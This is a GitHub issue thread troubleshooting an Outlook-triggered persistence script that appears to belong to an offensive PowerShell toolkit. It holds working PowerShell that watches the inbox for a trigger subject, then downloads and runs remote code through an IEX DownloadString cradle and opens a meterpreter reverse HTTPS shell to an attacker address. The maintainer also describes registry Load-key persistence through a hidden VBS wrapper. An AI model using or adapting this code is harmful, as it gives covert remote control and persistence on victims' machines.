outlook persistance

Question

outlook persistance

Closed this issue 9 years ago · 9 comments

command to call the {Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient
IEX $WebClientObject.DownloadString('http://goo.gl/yfLfQB')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.98 -LPORT 443 -Force}
}}

seems to fail as it doesn't ever call out.

Answer 1 · 2015-05-18T19:42:36.000Z

Take a look at the code that the URL in the cradle is pointing to. Invoke-Shellcode was updated and moved. Using the correct one will work.

Answer 2 · 2015-05-18T20:40:59.000Z

updated to use this invoke-shellcode still fails to call out https://raw.githubusercontent.com/jsthyer/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

Answer 3 · 2015-05-18T20:46:44.000Z

here is the contents of configuration.ps1

While($True){
$olFolderInbox = 6
$outlook = new-object -com outlook.application;
$ns = $outlook.GetNameSpace("MAPI");
$inbox = $ns.GetDefaultFolder($olFolderInbox)
$Emails = $inbox.items
$Emails | foreach {
if( $_.subject -match $TriggerWord)
{Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient IEX $WebClientObject.DownloadString('https://goo.gl/11XkCQ') Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.98 -LPORT 443 -Force} }}

#This determines how often the script checks in. Lower sleep time == more noise
Start-Sleep -s 10

Answer 4 · 2015-05-18T20:49:33.000Z

With the script running on the target, are you sending an email from the email account specified as the attacker email address as well as specifying the trigger word you specified as well? All this does is monitor the inbox for an email matching the attacker email address as well as the subject specified

Answer 5 · 2015-05-18T21:34:26.000Z

I currently have it only checking for subject. Yes this is all on a test
system. I see that it finds the email and evaluates to true. Does it call
one of the other scripts it creates to do the shell? I thought the start
job would do that. I could simply be miss reading what is happening here.
If so please disregard.

Thanks
On May 18, 2015 4:49 PM, "enigma0x3" notifications@github.com wrote:

With the script running on the target, are you sending an email from the
email account specified as the attacker email address as well as specifying
the trigger word you specified as well? All this does is monitor the inbox
for an email matching the attacker email address as well as the subject
specified

—
Reply to this email directly or view it on GitHub
#5 (comment)
.

Answer 6 · 2015-05-19T15:13:30.000Z

I probably should say that even if i remove the check for the email and the downloadstring to DownloadString('http://192.168.1.98/file.ps1') it doesn't call out for the ps1.

Answer 7 · 2015-05-19T15:15:11.000Z

I am currently standing up a lab environment to test this. I will comment back after I test it out. Thanks!!

Answer 8 · 2015-05-19T18:40:36.000Z

Can you verify that this file exists? C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookies.vbs

This is a VBScript wrapper that executes the configuration powershell file (which contains code to call out). This persistence method creates the VBS file and then a registry entry in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load. When the user logs in, the registry entry will call that VBS file which will then execute configuration.ps1 (which contains callback code). If the VBS file does exist, can you post the contents of it and maybe try running the .vbs directly?

Answer 9 · 2015-05-19T21:04:13.000Z

I remade the file again and again to trouble shoot and i dont know why but now its working please disregard this to me being crazy or something.